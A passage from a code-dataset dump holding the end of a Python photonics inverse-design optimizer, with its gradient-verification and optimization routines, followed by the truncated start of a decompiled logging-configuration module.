range( 0, self.num_wavelengths ):\n\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\t\t\tget_fom = self.compute_fom(\n\t\t\t\tself.omega_values[ wl_idx ], device_permittivity,\n\t\t\t\tself.focal_spots_x_voxels[ get_focal_point_idx ], self.wavelength_intensity_scaling[ wl_idx ] )\n\t\t\tfom_by_wl.append( get_fom )\n\n\t\tnet_fom = np.product( fom_by_wl )\n\n\t\treturn net_fom\n\n\t# CODE DUPLICATION! FIX\n\tdef compute_net_fom( self ):\n\t\treturn self.compute_net_fom_from_density( self.design_density )\n\n\tdef verify_adjoint_against_finite_difference_lambda_design_line( self, save_loc ):\n\t\t# get_density = upsample( self.design_density, self.coarsen_factor )\n\t\t# get_permittivity = self.density_to_permittivity( get_density )\n\t\tnp.random.seed( 23123 )\n\n\t\t# random_density = upsample( np.random.random( ( int( self.device_width_voxels / 4 ), int( self.device_height_voxels / 4 ) ) ), 4 )\n\t\t# random_perm = self.density_to_permittivity( random_density )\n\n\t\t# random_density = np.random.random( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\trandom_density = 0.5 * np.ones( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\trandom_density = upsample( random_density, self.coarsen_factor )\n\t\trandom_perm = self.density_to_permittivity( random_density )\n\n\n\t\tfd_focal_x_loc = self.focal_spots_x_voxels[ 0 ]\n\t\tfd_grad = np.zeros( self.design_density.shape )\n\t\tfd_grad_second = np.zeros( self.design_density.shape )\n\t\t# fom_init, adj_grad, adj_grad_orig, save_p_ind, save_p_ind2, save_p_ind3 = self.compute_fom_and_gradient_with_polarizability(\n\t\t# \tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\t\tfom_init, adj_grad = self.compute_fom_and_gradient(\n\t\t\tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\n\t\tadj_grad = adj_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\tadj_grad = ( self.coarsen_factor )**2 * reinterpolate_average( adj_grad, self.coarsen_factor )\n\n\t\tchoose_row = int( 0.5 * self.design_width_voxels )\n\t\tchoose_col = int( 0.5 * self.design_height_voxels )\n\n\t\th_min = -0.05\n\t\th_max = 0.05\n\t\tnum_h = 201\n\n\t\th_values = np.linspace( h_min, h_max, num_h )\n\n\t\tfom_line = np.zeros( num_h )\n\t\tfom_line = np.zeros( num_h )\n\n\t\tfor h_idx in range( 0, num_h ):\n\t\t\tcopy_perm = random_perm.copy()\n\t\t\tcopy_perm[\n\t\t\t\tchoose_row * self.coarsen_factor : ( choose_row + 1 ) * self.coarsen_factor,\n\t\t\t\tchoose_col * self.coarsen_factor : ( choose_col + 1 ) * self.coarsen_factor ] += h_values[ h_idx ]\n\t\t\t# copy_perm[\n\t\t\t# \tchoose_row * self.coarsen_factor,\n\t\t\t# \tchoose_col * self.coarsen_factor ] += h_values[ h_idx ]\n\n\t\t\tfd_permittivity = copy_perm.copy()\n\n\t\t\tfom_line[ h_idx ] = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\t\t\t\n\n\t\tnp.save( save_loc + \"_h_values.npy\", h_values )\n\t\tnp.save( save_loc + \"_fd_line.npy\", fom_line )\n\t\tnp.save( save_loc + \"_adj_grad.npy\", adj_grad )\n\t\t# np.save( save_loc + \"_adj_grad_orig.npy\", adj_grad_orig )\n\n\n\tdef verify_adjoint_against_finite_difference_lambda_design_anisotropic( self, save_loc ):\n\t\t# get_density = upsample( self.design_density, self.coarsen_factor )\n\t\t# get_permittivity = self.density_to_permittivity( get_density )\n\t\tnp.random.seed( 23123 )\n\n\t\trandom_density = upsample( np.random.random( ( int( self.device_width_voxels / 4 ), int( self.device_height_voxels / 4 ) ) ), 4 
)\n\t\trandom_perm = self.density_to_permittivity( random_density )\n\n\t\t# random_density = np.random.random( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\t# random_density = 0.5 * np.ones( ( self.design_width_voxels, self.design_height_voxels ) )\n\t\t# random_density = upsample( random_density, self.coarsen_factor )\n\t\t# random_perm = self.density_to_permittivity( random_density )\n\t\n\t\tfd_focal_x_loc = self.focal_spots_x_voxels[ 0 ]\n\t\tfd_grad = np.zeros( self.design_density.shape )\n\t\tfd_grad_second = np.zeros( self.design_density.shape )\n\t\tfom_init, adj_grad, adj_grad_orig, save_p_ind, save_p_ind2, save_p_ind3 = self.compute_fom_and_gradient_with_polarizability(\n\t\t\tself.omega_values[ 0 ], random_perm, fd_focal_x_loc )\n\n\t\th = 1e-3 / ( self.coarsen_factor**2 )\n\n\t\tfor row in range( 0, self.design_width_voxels ):\n\t\t\tfor col in range( 0, self.design_height_voxels ):\n\t\t\t\t# copy_density = random_density.copy()\n\t\t\t\tcopy_perm = random_perm.copy()\n\n\t\t\t\tcopy_perm[ row * self.coarsen_factor : (row + 1) * self.coarsen_factor, col * self.coarsen_factor : ( col + 1 ) * self.coarsen_factor ] += h\n\n\t\t\t\t# copy_density[ row, col ] += ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm.copy()#self.density_to_permittivity( fd_density )\n\n\t\t\t\tfom_up = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\t\t\t\n\n\n\n\n\t\t\t\tcopy_perm = random_perm.copy()\n\n\t\t\t\tcopy_perm[ row * self.coarsen_factor : (row + 1) * self.coarsen_factor, col * self.coarsen_factor : ( col + 1 ) * self.coarsen_factor ] -= h\n\n\t\t\t\t# copy_density[ row, col ] += ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm#self.density_to_permittivity( fd_density )\n\n\n\t\t\t\t# copy_density = random_density.copy()\n\t\t\t\t# copy_density[ row, col ] -= ( h / ( self.max_relative_permittivity - self.min_relative_permittivity ) )\n\t\t\t\t# fd_density = upsample( copy_density, self.coarsen_factor )\n\t\t\t\tfd_permittivity = copy_perm.copy()#self.density_to_permittivity( fd_density )\n\n\t\t\t\tfom_down = self.compute_fom( self.omega_values[ 0 ], fd_permittivity, fd_focal_x_loc )\n\n\t\t\t\tfd_grad[ row, col ] = ( fom_up - fom_down ) / ( 2 * h )\n\n\t\t\t\tfd_grad_second[ row, col ] = ( fom_up + fom_down - 2 * fom_init ) / ( h**2 )\n\n\n\t\tnp.save( save_loc + \"_fd_grad.npy\", fd_grad )\n\t\tnp.save( save_loc + \"_fd_grad_second.npy\", fd_grad_second )\n\t\tnp.save( save_loc + \"_adj_grad.npy\", adj_grad )\n\t\tnp.save( save_loc + \"_adj_grad_orig.npy\", adj_grad_orig )\n\n\n\n\tdef verify_adjoint_against_finite_difference( self ):\n\t\tfd_x = int( 0.5 * self.device_width_voxels )\n\t\tfd_x = int( self.coarsen_factor * 3 )\n\t\tfd_y = np.arange( 0, self.device_height_voxels )\n\t\tcompute_fd_density = np.zeros( len( fd_y ) )\n\t\tcompute_fd_real = np.zeros( len( fd_y ) )\n\t\tcompute_fd_imag = np.zeros( len( fd_y ) )\n\t\tomega_idx = int( 0.5 * len( self.omega_values ) )\n\t\tfd_omega = self.omega_values[ omega_idx ]\n\n\t\t# fd_init_device = 1.5 * np.ones( ( self.device_width_voxels, self.device_height_voxels ) )\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tfd_init_device 
= device_permittivity\n\n\t\tfocal_point_x = self.focal_spots_x_voxels[ 0 ]\n\n\t\tget_fom, get_grad_real, get_grad_imag = self.compute_fom_and_gradient_real_imag(\n\t\t\tfd_omega, fd_init_device, focal_point_x )\n\n\t\tget_grad_real = get_grad_real[\n\t\t\tself.device_width_start : self.device_width_end,\n\t\t\tself.device_height_start : self.device_height_end ]\n\t\tget_grad_imag = get_grad_imag[\n\t\t\tself.device_width_start : self.device_width_end,\n\t\t\tself.device_height_start : self.device_height_end ]\n\n\t\tinterpolate_grad_real = reinterpolate_average( get_grad_real, self.coarsen_factor )\n\t\tinterpolate_grad_imag = reinterpolate_average( get_grad_imag, self.coarsen_factor )\n\n\t\tget_grad_density = (\n\t\t\tnp.real( self.max_relative_permittivity - self.min_relative_permittivity ) * interpolate_grad_real +\n\t\t\tnp.imag( self.max_relative_permittivity - self.min_relative_permittivity ) * interpolate_grad_imag );\n\n\t\tfd_x_density = int( fd_x / self.coarsen_factor )\n\n\t\tfd_step_eps = 1e-6\n\t\tfd_step_rho = 1e-6\n\n\t\tnum = 10\n\n\t\tfor fd_y_idx in range( 0, num ):\n\t\t\tprint( \"working on \" + str( fd_y_idx ) )\n\t\t\tfd_design = self.design_density.copy()\n\t\t\tfd_design[ fd_x_density, fd_y[ fd_y_idx ] ] += fd_step_rho\n\n\t\t\timport_fd_density = upsample( fd_design, self.coarsen_factor )\n\t\t\tdevice_fd_permittivity = self.density_to_permittivity( import_fd_density )\n\n\t\t\tget_fom_step_density = self.compute_fom( fd_omega, device_fd_permittivity, focal_point_x )\n\n\n\t\t\tcompute_fd_density[ fd_y_idx ] = ( get_fom_step_density - get_fom ) / fd_step_eps\n\n\t\t\tfd_device_permittivity = fd_init_device.copy()\n\t\t\tfd_device_permittivity[ fd_x, fd_y[ fd_y_idx ] ] += fd_step_eps\n\t\t\tget_fom_step_real = self.compute_fom( fd_omega, fd_device_permittivity, focal_point_x )\n\n\t\t\tfd_device_permittivity = fd_init_device.copy()\n\t\t\tfd_device_permittivity[ fd_x, fd_y[ fd_y_idx ] ] += 1j * fd_step_eps\n\n\t\t\tget_fom_step_imag = self.compute_fom( fd_omega, fd_device_permittivity, focal_point_x )\n\n\t\t\tcompute_fd_real[ fd_y_idx ] = ( get_fom_step_real - get_fom ) / fd_step_eps\n\t\t\tcompute_fd_imag[ fd_y_idx ] = ( get_fom_step_imag - get_fom ) / fd_step_eps\n\n\t\timport matplotlib.pyplot as plt\n\t\tplt.subplot( 1, 3, 1 )\n\t\tplt.plot( get_grad_real[ fd_x, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( compute_fd_real[ 0 : num ], color='r', linewidth=2, linestyle='--' )\n\t\tplt.subplot( 1, 3, 2 )\n\t\tplt.plot( get_grad_imag[ fd_x, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( compute_fd_imag[ 0 : num ], color='r', linewidth=2, linestyle='--' )\t\t\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.plot( ( self.coarsen_factor**2 ) * get_grad_density[ fd_x_density, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( compute_fd_density[ 0 : num ], color='r', linewidth=2, linestyle='--' )\t\t\n\t\tplt.show()\n\n\tdef density_to_permittivity( self, density ):\n\t\treturn ( self.min_relative_permittivity + ( self.max_relative_permittivity - self.min_relative_permittivity ) * density )\n\n\tdef layer_spacer_averaging( self, gradient_input ):\n\t\tgradient_output = np.zeros( gradient_input.shape )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\tfill_gradient = np.zeros( self.design_width_voxels )\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tfill_gradient = np.mean( gradient_input[ :, layer_start : 
layer_end ], axis=1 )\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tgradient_output[ :, internal_layer_idx ] = fill_gradient\n\n\t\treturn gradient_output\n\n\tdef step_binarize( self, gradient, binarize_amount, binarize_max_movement, opt_mask ):\n\n\t\tdensity_for_binarizing = self.design_density.flatten()\n\t\tflatten_gradient = gradient.flatten()\n\n\t\t# flatten_design_cuts = density_for_binarizing.copy()\n\t\textract_binarization_gradient_full = compute_binarization_gradient( density_for_binarizing, self.binarization_set_point )\n\t\t# flatten_fom_gradients = flatten_gradient.copy()\n\t\tflatten_opt_mask = opt_mask.flatten()\n\n\n\t\tflatten_design_cuts = []\n\t\tflatten_fom_gradients = []\n\t\textract_binarization_gradient = []\n\n\t\tfor idx in range( 0, len( flatten_opt_mask ) ):\n\t\t\tif flatten_opt_mask[ idx ] > 0:\n\t\t\t\tflatten_design_cuts.append( density_for_binarizing[ idx ] )\n\t\t\t\tflatten_fom_gradients.append( flatten_gradient[ idx ] )\n\t\t\t\textract_binarization_gradient.append( extract_binarization_gradient_full[ idx ] )\n\n\t\tflatten_design_cuts = np.array( flatten_design_cuts )\n\t\tflatten_fom_gradients = np.array( flatten_fom_gradients )\n\t\textract_binarization_gradient = np.array( extract_binarization_gradient )\n\n\t\tbeta = binarize_max_movement\n\t\tprojected_binarization_increase = 0\n\n\t\tc = flatten_fom_gradients\n\n\t\tinitial_binarization = compute_binarization( flatten_design_cuts, self.binarization_set_point )\n\n\t\tb = np.real( extract_binarization_gradient )\n\n\t\tlower_bounds = np.zeros( len( c ) )\n\t\tupper_bounds = np.zeros( len( c ) )\n\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tupper_bounds[ idx ] = np.maximum( np.minimum( beta, 1 - flatten_design_cuts[ idx ] ), 0 )\n\t\t\tlower_bounds[ idx ] = np.minimum( np.maximum( -beta, -flatten_design_cuts[ idx ] ), 0 )\n\n\t\tmax_possible_binarization_change = 0\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tif b[ idx ] > 0:\n\t\t\t\tmax_possible_binarization_change += b[ idx ] * upper_bounds[ idx ]\n\t\t\telse:\n\t\t\t\tmax_possible_binarization_change += b[ idx ] * lower_bounds[ idx ]\n\t\t\n\t\t# Try this! 
Not sure how well it will work\n\t\t# if initial_binarization < 0.1:\n\t\t# \talpha = binarize_amount\n\t\t# else:\n\t\t\t# alpha = np.minimum( initial_binarization * max_possible_binarization_change, binarize_amount )\n\t\talpha = np.minimum( max_possible_binarization_change, binarize_amount )\n\n\t\tdef ramp( x ):\n\t\t\treturn np.maximum( x, 0 )\n\n\t\tdef opt_function( nu ):\n\t\t\tlambda_1 = ramp( nu * b - c )\n\t\t\tlambda_2 = c + lambda_1 - nu * b\n\n\t\t\treturn -( -np.dot( lambda_1, upper_bounds ) + np.dot( lambda_2, lower_bounds ) + nu * alpha )\n\n\t\ttolerance = 1e-12\n\t\toptimization_solution_nu = scipy.optimize.minimize( opt_function, 0, tol=tolerance )\n\n\t\tnu_star = optimization_solution_nu.x\n\t\tlambda_1_star = ramp( nu_star * b - c )\n\t\tlambda_2_star = c + lambda_1_star - nu_star * b\n\t\tx_star = np.zeros( len( c ) )\n\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tif lambda_1_star[ idx ] > 0:\n\t\t\t\tx_star[ idx ] = upper_bounds[ idx ]\n\t\t\telse:\n\t\t\t\tx_star[ idx ] = lower_bounds[ idx ]\n\n\n\t\tproposed_design_variable = flatten_design_cuts + x_star\n\t\tproposed_design_variable = np.minimum( np.maximum( proposed_design_variable, 0 ), 1 )\n\n\t\trefill_idx = 0\n\t\trefill_design_variable = density_for_binarizing.copy()\n\t\tfor idx in range( 0, len( flatten_opt_mask ) ):\n\t\t\tif flatten_opt_mask[ idx ] > 0:\n\t\t\t\trefill_design_variable[ idx ] = proposed_design_variable[ refill_idx ]\n\t\t\t\trefill_idx += 1\n\n\t\treturn np.reshape( refill_design_variable, self.design_density.shape )\n\n\tdef get_device_permittivity( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\treturn device_permittivity\n\n\tdef pair_array( self, input_array ):\n\t\toutput_array = np.zeros( input_array.shape, dtype=input_array.dtype )\n\t\tfor pair_idx in range( 0, len( self.density_pairings ) ):\n\t\t\tget_pair = self.density_pairings[ pair_idx ]\n\t\t\tdensity0 = input_array[ get_pair[ 0 ], get_pair[ 1 ] ]\n\t\t\tdensity1 = input_array[ get_pair[ 2 ], get_pair[ 3 ] ]\n\n\t\t\tdensity_average = 0.5 * ( density0 + density1 )\n\n\t\t\toutput_array[ get_pair[ 0 ], get_pair[ 1 ] ] = density_average\n\t\t\toutput_array[ get_pair[ 2 ], get_pair[ 3 ] ] = density_average\n\n\t\treturn output_array\n\n\tdef optimize_vote(\n\t\tself, num_iterations,\n\t\tfolder_for_saving ):\n\n\t\tself.fom_evolution = np.zeros( num_iterations )\n\t\tself.density_evolution = np.zeros( ( num_iterations, self.design_width_voxels, self.design_height_voxels ) )\n\n\t\tmake_sigmoid = sigmoid.Sigmoid( 0.5, 2.0 )\n\n\t\tdef density_to_fom_and_grad( test_density ):\n\t\t\timport_density = upsample( test_density, self.coarsen_factor )\n\t\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\t\tgradient_by_wl = []\n\t\t\tfom_by_wl = []\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\n\t\t\t\tget_fom, get_grad = self.compute_fom_and_gradient(\n\t\t\t\t\tself.omega_values[ wl_idx ], device_permittivity, self.focal_spots_x_voxels[ get_focal_point_idx ],\n\t\t\t\t\tself.wavelength_intensity_scaling[ wl_idx ] )\n\n\t\t\t\tscale_fom_for_wl = get_fom\n\n\t\t\t\tupsampled_device_grad = get_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\t\t\tscale_gradient_for_wl = upsampled_device_grad\n\n\t\t\t\tgradient_by_wl.append( scale_gradient_for_wl 
)\n\t\t\t\tfom_by_wl.append( scale_fom_for_wl )\n\n\n\t\t\tnet_fom = np.product( fom_by_wl )\n\t\t\tnet_gradient = np.zeros( gradient_by_wl[ 0 ].shape )\n\n\t\t\t# We are currently not doing a performance based weighting here, but we can add it in\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\twl_gradient = np.real( self.max_relative_permittivity - self.min_relative_permittivity ) * gradient_by_wl[ wl_idx ]\n\t\t\t\tweighting = net_fom / fom_by_wl[ wl_idx ]\n\n\t\t\t\tnet_gradient += ( weighting * wl_gradient )\n\n\t\t\tnet_gradient = reinterpolate_average( net_gradient, self.coarsen_factor )\n\n\n\t\t\t#\n\t\t\t# Now, we should zero out non-designable regions and average over designable layers\n\t\t\t#\n\t\t\tnet_gradient = self.layer_spacer_averaging( net_gradient )\n\t\t\tgradient_norm = vector_norm( net_gradient )\n\n\t\t\t# Using a scaled gradient might mess up the comparison between different iterations in terms of gradient\n\t\t\t# magnitude\n\t\t\tnorm_scaled_gradient = net_gradient / gradient_norm\n\n\t\t\treturn net_fom, norm_scaled_gradient\n\n\t\tself.design_density = 1.0 * np.greater(\n\t\t\tnp.random.random( ( self.design_width_voxels, self.design_height_voxels ) ),\n\t\t\t0.5 )\n\n\t\tfor iter_idx in range( 0, num_iterations ):\n\t\t\tif ( iter_idx % 10 ) == 0:\n\t\t\t\tlog_file = open( self.save_folder + \"/log.txt\", 'a' )\n\t\t\t\tlog_file.write( \"Iteration \" + str( iter_idx ) + \" out of \" + str( num_iterations - 1 ) + \"\\n\")\n\t\t\t\tlog_file.close()\n\n\t\t\teval_fom, eval_grad = density_to_fom_and_grad( self.design_density )\n\n\t\t\tprint( eval_fom )\n\n\t\t\tself.fom_evolution[ iter_idx ] = eval_fom\n\t\t\tself.density_evolution[ iter_idx ] = self.design_density\n\n\t\t\tprobability_norm = 0.0\n\t\t\tfor x_idx in range( 0, self.design_width_voxels ):\n\t\t\t\tfor y_idx in range( 0, self.design_height_voxels ):\n\t\t\t\t\tget_value = self.design_density[ x_idx, y_idx ]\n\t\t\t\t\tget_grad = eval_grad[ x_idx, y_idx ]\n\t\t\t\t\tif ( get_value > 0.5 ) and ( get_grad < 0 ):\n\t\t\t\t\t\tprobability_norm += np.abs( get_grad )\n\t\t\t\t\telif ( get_value < 0.5 ) and ( get_grad > 0 ):\n\t\t\t\t\t\tprobability_norm += np.abs( get_grad )\n\n\t\t\tif probability_norm > 0:\n\t\t\t\teval_grad /= ( probability_norm / 10. 
)\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\t\tfor x_idx in range( 0, self.design_width_voxels ):\n\t\t\t\tfor y_idx in range( 0, self.design_height_voxels ):\n\t\t\t\t\tget_value = self.design_density[ x_idx, y_idx ]\n\t\t\t\t\tget_grad = eval_grad[ x_idx, y_idx ]\n\t\t\t\t\tif ( get_value > 0.5 ) and ( get_grad < 0 ):\n\t\t\t\t\t\tif np.random.random() < np.abs( get_grad ):\n\t\t\t\t\t\t\tself.design_density[ x_idx, y_idx ] = 0.0\n\t\t\t\t\telif ( get_value < 0.5 ) and ( get_grad > 0 ):\n\t\t\t\t\t\tif np.random.random() < np.abs( get_grad ):\n\t\t\t\t\t\t\tself.design_density[ x_idx, y_idx ] = 1.0\n\n\n\t\t\tnp.save( folder_for_saving + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t\tnp.save( folder_for_saving + \"_density_evolution.npy\", self.density_evolution )\n\n\n\tdef optimize(\n\t\tself, num_iterations,\n\t\tfolder_for_saving ):\n\n\t\tself.fom_evolution = np.zeros( num_iterations )\n\t\tself.density_prediction_evolution = np.zeros( ( num_iterations, self.design_width_voxels, self.design_height_voxels ) )\n\n\t\tmake_sigmoid = sigmoid.Sigmoid( 0.5, 2.0 )\n\n\t\tdef density_to_fields_fom_and_grad( test_density ):\n\t\t\timport_density = upsample( test_density, self.coarsen_factor )\n\t\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\t\tgradient_by_wl = []\n\t\t\tfom_by_wl = []\n\t\t\treal_fields_by_wl = []\n\t\t\timag_fields_by_wl = []\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\n\t\t\t\tget_fom, get_grad, get_Ez = self.compute_fom_and_gradient_and_fields(\n\t\t\t\t\tself.omega_values[ wl_idx ], device_permittivity, self.focal_spots_x_voxels[ get_focal_point_idx ],\n\t\t\t\t\tself.wavelength_intensity_scaling[ wl_idx ] )\n\n\t\t\t\tscale_fom_for_wl = get_fom\n\n\t\t\t\tupsampled_device_grad = get_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\t\t\tscale_gradient_for_wl = upsampled_device_grad\n\n\t\t\t\tgradient_by_wl.append( scale_gradient_for_wl )\n\t\t\t\tfom_by_wl.append( scale_fom_for_wl )\n\n\t\t\t\treal_fields_by_wl.append(\n\t\t\t\t\treinterpolate_average( \n\t\t\t\t\t\tnp.real( get_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] ),\n\t\t\t\t\t\tself.coarsen_factor ) )\n\t\t\t\timag_fields_by_wl.append(\n\t\t\t\t\treinterpolate_average( \n\t\t\t\t\t\tnp.imag( get_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] ),\n\t\t\t\t\t\tself.coarsen_factor ) )\n\n\t\t\tnet_fom = np.product( fom_by_wl )\n\t\t\tnet_gradient = np.zeros( gradient_by_wl[ 0 ].shape )\n\n\t\t\t# We are currently not doing a performance based weighting here, but we can add it in\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\twl_gradient = np.real( self.max_relative_permittivity - self.min_relative_permittivity ) * gradient_by_wl[ wl_idx ]\n\t\t\t\tweighting = net_fom / fom_by_wl[ wl_idx ]\n\n\t\t\t\tnet_gradient += ( weighting * wl_gradient )\n\n\t\t\tnet_gradient = reinterpolate_average( net_gradient, self.coarsen_factor )\n\n\n\t\t\t#\n\t\t\t# Now, we should zero out non-designable regions and average over designable layers\n\t\t\t#\n\t\t\tnet_gradient = self.layer_spacer_averaging( net_gradient )\n\t\t\tgradient_norm = vector_norm( net_gradient )\n\n\t\t\t# Using a scaled gradient might mess up the comparison between different iterations in terms of gradient\n\t\t\t# 
magnitude\n\t\t\tnorm_scaled_gradient = net_gradient / gradient_norm\n\n\t\t\treturn net_fom, net_gradient, real_fields_by_wl, imag_fields_by_wl\n\n\n\t\tnp.random.seed( 2143123 )\n\t\tnetwork_input_np = np.random.random( ( 1, 2 * self.num_wavelengths + 1, self.design_width_voxels, self.design_height_voxels ) ) - 0.5\n\t\tnetwork_input_np[ 0, 0 ] += 0.5\n\t\tpreinput_sigmoid = network_input_np[ 0, 0 ]\n\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\tkernel_size = 3\n\t\tmake_net = PermittivityPredictor( self.num_wavelengths, kernel_size )\n\n\t\tget_density_predictions = make_net.forward( torch.tensor( network_input_np, requires_grad=True ).float() )[ 0, 0 ]\n\n\t\tpreinput_sigmoid = get_density_predictions.detach().numpy()\n\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\teval_fom, eval_grad, eval_real_fields, eval_imag_fields = density_to_fields_fom_and_grad( network_input_np[ 0, 0 ] )\n\n\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx ] = eval_real_fields[ wl_idx ]\n\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx + 1 ] = eval_imag_fields[ wl_idx ]\n\n\n\n\t\toptimizer = torch.optim.SGD( make_net.parameters(), lr=100.0 )\n\n\t\tfor iter_idx in range( 0, num_iterations ):\n\t\t\tif ( iter_idx % 10 ) == 0:\n\t\t\t\tlog_file = open( self.save_folder + \"/log.txt\", 'a' )\n\t\t\t\tlog_file.write( \"Iteration \" + str( iter_idx ) + \" out of \" + str( num_iterations - 1 ) + \"\\n\")\n\t\t\t\tlog_file.close()\n\n\t\t\tsigmoid_backprop = make_sigmoid.chain_rule( -eval_grad, network_input_np[ 0, 0 ], preinput_sigmoid )\n\n\t\t\toptimizer.zero_grad()\n\t\t\tloss = ( torch.tensor( sigmoid_backprop ).float() * get_density_predictions ).sum()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tprint( eval_fom )\n\n\t\t\t# network_input_np[ 0, 0 ] = np.greater_equal( get_density_predictions.detach().numpy(), 0.5 )\n\t\t\t# preinput_sigmoid = get_density_predictions.detach().numpy()\n\t\t\t# network_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\n\t\t\tget_density_predictions = make_net.forward( torch.tensor( network_input_np, requires_grad=True ).float() )[ 0, 0 ]\n\n\t\t\tpreinput_sigmoid = get_density_predictions.detach().numpy()\n\t\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\t\t# binarize_predictions = np.greater_equal( np.squeeze( get_density_predictions.detach().numpy() ), 0.5 )\n\t\t\teval_fom, eval_grad, eval_real_fields, eval_imag_fields = density_to_fields_fom_and_grad( network_input_np[ 0, 0 ] )\n\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx ] = eval_real_fields[ wl_idx ]\n\t\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx + 1 ] = eval_imag_fields[ wl_idx ]\n\n\n\t\t\tself.fom_evolution[ iter_idx ] = eval_fom\n\t\t\tself.density_prediction_evolution[ iter_idx ] = get_density_predictions.detach().numpy()\n\n\t\t\tnp.save( folder_for_saving + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t\tnp.save( folder_for_saving + \"_density_prediction_evolution.npy\", self.density_prediction_evolution )\n\n\n\tdef save_optimization_data( self, file_base ):\n\t\tnp.save( file_base + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t# np.save( file_base + 
\"_density_prediction_evolution.npy\", self.density_prediction_evolution )\n\t\tnp.save( folder_for_saving + \"_density_evolution.npy\", self.density_evolution )\n\n\n\n","sub_path":"inverse_design/Landscape/ColorSplittingOptimizationDeep2D.py","file_name":"ColorSplittingOptimizationDeep2D.py","file_ext":"py","file_size_in_byte":48045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48199262","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\fragmap\\debug.py\n# Compiled at: 2019-09-05 13:55:36\n# Size of source mod 2**32: 1524 bytes\nimport argparse, sys, logging\n_logging_categories = [\n 'grid', 'sorting', 'grouping', 'parser', 'update', 'console', 'test', 'matrix']\n_enable_logging = {category:False for category in _logging_categories}\nlogging.basicConfig()\nfor cat in _logging_categories:\n l = logging.getLogger(cat)\n l.setLevel(logging.CRITICAL)\n\ndef is_logging(category):\n return _enable_logging[category]\n\n\ndef enable_logging(category):\n if category in _logging_categories:\n get(category).setLevel(logging.DEBUG)\n _enable_logging[category] = True\n else:\n print(\"WARNING: Unknown logging category '{}'\".format(category))\n\n\ndef get(category):\n return logging.getLogger(category)\n\n\ndef parse_args(extendable=False):\n p = argparse.ArgumentParser(add_help=(not extendable))\n p.add_argument('--log', nargs='+', choices=([\n 'all'] + _logging_categories),\n metavar='CATEGORY',\n help='Which categories of log messages to send to standard output: %(choices)s')\n args, unknown_args = p.parse_known_args()\n if args.log:\n if args.log[0] == 'all':\n args.log = _logging_categories\n for cat in 